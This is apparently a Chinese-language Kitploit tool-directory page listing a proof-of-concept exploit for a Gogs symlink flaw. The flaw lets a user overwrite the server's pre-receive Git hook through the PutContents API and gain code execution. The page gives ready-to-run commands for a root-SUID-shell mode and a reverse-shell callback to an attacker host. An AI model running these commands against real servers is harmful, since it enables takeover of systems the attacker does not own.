Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-81110-PoC — Gogs中PutContents API对符号链接处理不当,导致本地代码执行。 | Kitploit
工具/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubbridgeralderson/cve-2025-81110-poc

CVE-2025-81110-PoC

Gogs中PutContents API对符号链接处理不当,导致本地代码执行。

查看仓库
415个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-81110-PoC

Gogs中PutContents API对符号链接处理不当,导致本地代码执行。

本仓库包含针对Gogs 0.13.0之前版本中一个严重漏洞的专业级利用程序。该利用程序利用了一个逻辑缺陷:Gogs API在更新仓库内容时未能验证文件类型。通过注入指向服务器端Git钩子(pre-receive)的符号链接,认证用户可以恶意脚本覆盖钩子的内容。随后的Git推送操作将触发该脚本在运行Gogs服务的用户(通常是root)上下文中执行。

符号链接注入:攻击者推送指向内部仓库钩子(例如 /root/gogs-repositories//.git/hooks/pre-receive)的符号链接。

API覆盖:Gogs API允许更新符号链接的内容。由于操作系统在写操作期间跟随链接,内部Git钩子被覆盖。

RCE/权限提升:后续的Git推送触发pre-receive钩子。如果Gogs配置了 RUN_USER = root,攻击者将获得完全的系统控制。

需求

  • Python 3.x
  • requests库
  • 攻击者机器上安装git命令行工具

使用方法

SUID模式

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

完成后,在目标上获取root访问权限:

root@kitploit:~
/tmp/rootbash -p

反向Shell

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

参数参考

免责声明

此工具仅用于教育目的和授权的安全审计。作者不对该工具在您拥有或明确许可测试的系统上造成的任何滥用或损坏负责。

下载工具
ArgumentRequired描述
--url是Gogs实例的基础URL(例如 http://127.0.0.1:3001)。
--user是有效的用户名用于认证。
--pass是指定用户的有效密码。
--mode否利用模式:suid(创建 /tmp/rootbash)或 rev(反向Shell)。
--lhost否反向Shell回调的本地IP地址。
--lport否反向Shell监听器的本地端口。